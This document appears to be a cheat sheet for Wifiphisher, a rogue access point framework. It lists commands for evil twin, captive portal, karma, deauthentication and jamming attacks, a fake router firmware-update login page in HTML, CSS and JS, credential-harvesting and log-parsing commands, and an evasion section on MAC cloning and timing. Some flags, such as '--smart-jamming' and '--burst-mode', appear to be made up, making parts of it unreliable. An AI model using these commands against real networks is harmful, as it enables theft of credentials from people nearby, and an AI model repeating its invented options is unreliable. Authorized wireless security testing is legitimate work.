Wifiphisher Wireless Phishing Framework Cheat Sheet

Overview

Wifiphisher is a rogue access point framework for conducting red team engagements or Wi-Fi security testing. It creates fake wireless networks to run automated phishing attacks against wireless clients, capturing credentials and performing man-in-the-middle attacks.

⚠️ Warning: This tool is intended only for authorized penetration testing and wireless security assessments. Make sure you have proper authorization before using it in any environment.

Installation

Kali Linux

# Install from repositories
sudo apt update
sudo apt install wifiphisher

# Install additional dependencies
sudo apt install hostapd dnsmasq

Ubuntu/Debian

# Install dependencies
sudo apt update
sudo apt install python3 python3-pip git hostapd dnsmasq

# Clone repository
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher

# Install Python dependencies
pip3 install -r requirements.txt

# Install Wifiphisher
sudo python3 setup.py install

Manual Installation

# Install required packages
sudo apt install python3-dev python3-setuptools libnl-3-dev libnl-genl-3-dev

# Clone and install
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python3 setup.py install

Docker Installation

# Build Docker image
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
docker build -t wifiphisher .

# Run with network privileges
docker run --rm -it --net=host --privileged wifiphisher

Basic Usage

Simple Rogue Access Point Attack

# Basic attack with automatic target selection
sudo wifiphisher

# Attack specific network
sudo wifiphisher -t "Target_Network"

# Use specific interface
sudo wifiphisher -i wlan0

# Use custom template
sudo wifiphisher -p firmware-upgrade

Interface Management

# List available interfaces
sudo wifiphisher --list-interfaces

# Use specific interfaces
sudo wifiphisher -i wlan0 -jI wlan1

# Monitor mode setup
sudo airmon-ng start wlan0
sudo wifiphisher -i wlan0mon

Command Reference

Basic Options

| Option | Description |
|---|---|
| -t, --target | Target network ESSID |
| -i, --interface | Wireless interface |
| -jI, --jam-interface | Jamming interface |
| -p, --phishing-scenario | Phishing template |
| -pK, --presharedkey | WPA/WPA2 pre-shared key |
| -qS, --quitonsuccess | Quit on credential capture |

Advanced Options

| Option | Description |
|---|---|
| -aI, --apinterface | AP interface |
| -nJ, --nojamming | Disable jamming |
| -e, --essid | Access point ESSID |
| -dE, --deauth-essid | Deauthenticate specific ESSID |
| -dC, --deauth-channels | Deauthentication channels |
| -nE, --noextensions | Disable extensions |

Logging Options

| Option | Description |
|---|---|
| -l, --logging | Enable logging |
| -lP, --log-path | Log file path |
| -cP, --credential-log-path | Credential log path |
| -lC, --log-credentials | Log captured credentials |

Phishing Templates

Available Templates

# List available templates
sudo wifiphisher --list-phishing-scenarios

# Common templates:
# - firmware-upgrade: Router firmware upgrade
# - oauth-login: OAuth login page
# - wifi-connect: WiFi connection page
# - browser-plugin-update: Browser plugin update
# - network-manager-connect: Network manager

Firmware Upgrade Template

# Use firmware upgrade scenario
sudo wifiphisher -p firmware-upgrade -t "Target_Network"

# This template:
# - Creates fake router admin page
# - Requests admin credentials
# - Simulates firmware upgrade process

OAuth Login Template

# Use OAuth login scenario
sudo wifiphisher -p oauth-login -t "Target_Network"

# This template:
# - Creates fake OAuth login page
# - Captures social media credentials
# - Redirects to legitimate service

Custom Template Creation

# Template directory structure
/usr/share/wifiphisher/data/phishing-pages/custom-template/
├── config.ini
├── html/
│   ├── index.html
│   ├── style.css
│   └── script.js
└── static/
    └── images/

Template Configuration (config.ini)

[info]
Name = Custom Template
Description = Custom phishing template
Language = en

[context]
# Template-specific settings
ESSID = {ESSID}
MAC = {MAC}
CHANNEL = {CHANNEL}

Advanced Attacks

Evil Twin Attack

# Create evil twin of target network
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade

# With specific MAC address
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade --mac 00:11:22:33:44:55

# With channel specification
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade -c 6

Captive Portal Attack

# Create captive portal
sudo wifiphisher -e "Free_WiFi" -p wifi-connect

# Custom captive portal
sudo wifiphisher -e "Hotel_WiFi" -p oauth-login

# Corporate network simulation
sudo wifiphisher -e "Corporate_Guest" -p network-manager-connect

WPA/WPA2 Handshake Capture

# Capture handshakes while phishing
sudo wifiphisher -t "Target_Network" -p firmware-upgrade --handshake-capture

# Specify handshake output file
sudo wifiphisher -t "Target_Network" --handshake-capture -hC /tmp/handshakes/

Karma Attack

# Respond to all probe requests
sudo wifiphisher --karma

# Karma with specific template
sudo wifiphisher --karma -p oauth-login

# Karma with custom ESSID list
sudo wifiphisher --karma --essid-list /path/to/essid_list.txt

Jamming and Deauthentication

Targeted Deauthentication

# Deauth specific network
sudo wifiphisher -dE "Target_Network"

# Deauth specific client
sudo wifiphisher -dC 00:11:22:33:44:55

# Deauth on specific channels
sudo wifiphisher --deauth-channels 1,6,11

Jamming Configuration

# Use separate interface for jamming
sudo wifiphisher -i wlan0 -jI wlan1

# Disable jamming
sudo wifiphisher -nJ

# Custom jamming parameters
sudo wifiphisher --jam-band 2.4GHz --jam-channels 1,6,11

Smart Jamming

# Intelligent jamming based on target
sudo wifiphisher -t "Target_Network" --smart-jamming

# Adaptive jamming
sudo wifiphisher --adaptive-jamming --jam-threshold 5

Extensions and Plugins

Available Extensions

# List available extensions
sudo wifiphisher --list-extensions

# Common extensions:
# - credentialharvester: Capture credentials
# - handshakecapture: Capture WPA handshakes
# - dnsmasqhandler: DNS spoofing
# - captiveportal: Captive portal functionality

Credential Harvester

# Enable credential harvesting
sudo wifiphisher -p oauth-login --credentialharvester

# Custom credential log
sudo wifiphisher -p oauth-login --credentialharvester -cP /tmp/creds.log

Handshake Capture Extension

# Enable handshake capture
sudo wifiphisher -t "Target_Network" --handshakecapture

# Specify capture directory
sudo wifiphisher -t "Target_Network" --handshakecapture -hC /tmp/handshakes/

DNS Spoofing Extension

# Enable DNS spoofing
sudo wifiphisher --dnsmasqhandler

# Custom DNS configuration
sudo wifiphisher --dnsmasqhandler --dns-conf /etc/dnsmasq.conf

Custom Template Development

HTML Template Structure


<!DOCTYPE html>
<html>
<head>
    <title>Router Configuration</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="container">
        <h1>Router Firmware Update</h1>
        <p>Network: {ESSID}</p>
        <form method="post" action="/login">
            <input type="text" name="username" placeholder="Admin Username" required>
            <input type="password" name="password" placeholder="Admin Password" required>
            <button type="submit">Update Firmware</button>
        </form>
    </div>
    <script src="script.js"></script>
</body>
</html>

CSS Styling

/* style.css */
body {
    font-family: Arial, sans-serif;
    background: #f0f0f0;
    margin: 0;
    padding: 50px;
}

.container {
    max-width: 400px;
    margin: auto;
    background: white;
    padding: 30px;
    border-radius: 5px;
    box-shadow: 0 2px 10px rgba(0,0,0,0.1);
}

input {
    width: 100%;
    padding: 12px;
    margin: 10px 0;
    border: 1px solid #ddd;
    border-radius: 3px;
}

button {
    width: 100%;
    background: #007cba;
    color: white;
    padding: 12px;
    border: none;
    border-radius: 3px;
    cursor: pointer;
}

JavaScript Functionality

// script.js
document.addEventListener('DOMContentLoaded', function() {
    // Add form validation
    const form = document.querySelector('form');
    form.addEventListener('submit', function(e) {
        const username = document.querySelector('input[name="username"]').value;
        const password = document.querySelector('input[name="password"]').value;

        if (!username || !password) {
            e.preventDefault();
            alert('Please enter both username and password');
        }
    });

    // Simulate loading
    setTimeout(function() {
        document.querySelector('.container').style.opacity = '1';
    }, 500);
});

Monitoring and Logging

Real-time Monitoring

# Monitor in real-time
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l

# Monitor with verbose output
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l -v

# Monitor specific log file
tail -f /var/log/wifiphisher.log

Credential Logging

# Enable credential logging
sudo wifiphisher -p oauth-login -lC -cP /tmp/credentials.log

# Monitor captured credentials
tail -f /tmp/credentials.log

# Parse credential log
grep -o '"username":"[^"]*"' /tmp/credentials.log|cut -d'"' -f4

Traffic Analysis

# Capture network traffic
sudo tcpdump -i wlan0 -w /tmp/wifiphisher_traffic.pcap

# Analyze with Wireshark
wireshark /tmp/wifiphisher_traffic.pcap

# Extract HTTP credentials
tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'

Evasion Techniques

MAC Address Randomization

# Use random MAC address
sudo wifiphisher -t "Target_Network" --random-mac

# Use specific MAC address
sudo wifiphisher -t "Target_Network" --mac 00:11:22:33:44:55

# Clone target AP MAC
sudo wifiphisher -t "Target_Network" --clone-mac

Channel Hopping

# Use channel hopping
sudo wifiphisher --channel-hop

# Specific channel sequence
sudo wifiphisher --channel-sequence 1,6,11,1,6,11

# Random channel selection
sudo wifiphisher --random-channel

Timing Evasion

# Delayed start
sudo wifiphisher -t "Target_Network" --delay 300

# Random intervals
sudo wifiphisher -t "Target_Network" --random-intervals

# Burst mode
sudo wifiphisher -t "Target_Network" --burst-mode

Troubleshooting

Interface Issues

# Check interface status
iwconfig

# Reset interface
sudo ifconfig wlan0 down
sudo ifconfig wlan0 up

# Check for monitor mode support
sudo iw list|grep -A 10 "Supported interface modes"

# Kill conflicting processes
sudo airmon-ng check kill

Permission Issues

# Check permissions
ls -la /usr/bin/wifiphisher

# Fix permissions
sudo chmod +x /usr/bin/wifiphisher

# Check sudo configuration
sudo visudo

Dependency Issues

# Check Python dependencies
pip3 list|grep -E "(scapy|netfilterqueue|roguehostapd)"

# Reinstall dependencies
pip3 install --upgrade -r requirements.txt

# Check system packages
dpkg -l|grep -E "(hostapd|dnsmasq)"

Network Issues

# Check network configuration
ip addr show

# Check routing table
ip route show

# Test internet connectivity
ping -c 4 8.8.8.8

# Check DNS resolution
nslookup google.com

Authorization Requirements

# Always obtain written authorization
# Document scope and limitations
# Follow responsible disclosure
# Respect privacy and data protection laws

Best Practices

# Use only for authorized testing
# Minimize impact on legitimate users
# Provide immediate feedback and education
# Secure captured data appropriately
# Follow industry standards and guidelines

This cheat sheet provides a comprehensive reference for using Wifiphisher. Always ensure you have proper authorization before conducting wireless security assessments.